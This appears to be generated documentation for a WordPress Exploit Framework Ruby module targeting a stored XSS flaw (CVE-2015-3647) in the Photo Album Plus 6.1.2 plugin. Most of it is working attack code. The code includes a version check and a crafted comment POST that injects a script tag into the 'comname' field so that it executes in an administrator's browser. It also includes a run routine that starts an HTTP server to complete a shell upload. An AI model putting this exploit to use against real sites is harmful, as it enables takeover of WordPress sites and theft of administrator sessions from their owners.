class Wpxf::Exploit::PhotoAlbumPlusXssShellUpload

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::WordPress::Xss::new
# File lib/wpxf/modules/exploit/shell/photo_album_plus_xss_shell_upload.rb, line 10
def initialize
  super

  update_info(
    name: 'Photo Album Plus 6.1.2 XSS Shell Upload',
    desc: 'The vulnerability exists due to the absence of filtration of '\
          'user-supplied input passed via the "comname" and "comemail" '\
          'HTTP POST parameters to "/wp-content/plugins/wp-photo-album-plus/'\
          'wppa-ajax-front.php" script when posting a comment.'\
          "\n"\
          'A remote attacker can post a specially crafted message '\
          'containing malicious HTML or script code and execute it in '\
          'the administrator\'s browser in context of the vulnerable '\
          'website, when an administrator views images or comments in '\
          'the administrative interface.',
    author: [
      'High-Tech Bridge Security Research Lab', # Discovery and disclosure
      'rastating'                               # WPXF module
    ],
    references: [
      ['CVE', '2015-3647'],
      ['WPVDB', '7996'],
      ['URL', 'https://www.htbridge.com/advisory/HTB23257']
    ],
    date: 'May 20 2015'
  )
end

Public Instance Methods

ajax_url() click to toggle source
# File lib/wpxf/modules/exploit/shell/photo_album_plus_xss_shell_upload.rb, line 46
def ajax_url
  normalize_uri(plugin_url, 'wppa-ajax-front.php')
end
check() click to toggle source
# File lib/wpxf/modules/exploit/shell/photo_album_plus_xss_shell_upload.rb, line 38
def check
  check_plugin_version_from_readme('wp-photo-album-plus', '6.1.3')
end
plugin_url() click to toggle source
# File lib/wpxf/modules/exploit/shell/photo_album_plus_xss_shell_upload.rb, line 42
def plugin_url
  normalize_uri(wordpress_url_plugins, 'wp-photo-album-plus')
end
post_script() click to toggle source
# File lib/wpxf/modules/exploit/shell/photo_album_plus_xss_shell_upload.rb, line 50
def post_script
  execute_post_request(
    url: ajax_url,
    body: {
      'action'      => 'wppa',
      'wppa-action' => 'do-comment',
      'photo-id'    => Utility::Text.rand_numeric(3),
      'comment'     => Utility::Text.rand_alpha(50),
      'comemail'    => "#{Utility::Text.rand_alpha(10)}@#{Utility::Text.rand_alpha(10)}.com",
      'comname'     => "#{Utility::Text.rand_alpha(8)}<script>#{xss_include_script}</script>"
    }
  )
end
run() click to toggle source
Calls superclass method Wpxf::Module#run
# File lib/wpxf/modules/exploit/shell/photo_album_plus_xss_shell_upload.rb, line 64
def run
  return false unless super

  # Success will determined in another procedure, so initialize to false.
  @success = false

  emit_info 'Storing script...'
  emit_info xss_include_script, true
  res = post_script

  if res.nil?
    emit_error 'No response from the target'
    return false
  end

  if res.code != 200
    emit_error "Server responded with code #{res.code}"
    return false
  end

  emit_success "Script stored and will be executed upon visiting /wp-admin/admin.php?page=wppa_manage_comments"
  start_http_server

  return @success
end